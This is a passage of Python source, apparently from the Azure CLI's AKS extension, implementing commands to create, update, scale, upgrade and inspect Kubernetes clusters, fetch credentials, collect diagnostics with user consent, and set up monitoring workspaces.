skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = _set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_lb_profile = load_balancer_managed_outbound_ip_count is not None or \
load_balancer_outbound_ips is not None or load_balancer_outbound_ip_prefixes is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if load_balancer_profile:
instance.network_profile.load_balancer_profile = load_balancer_profile
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard'
}
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{normalized_fqdn}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
return
else:
display_diagnostics_report(temp_kubeconfig_path)
return
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
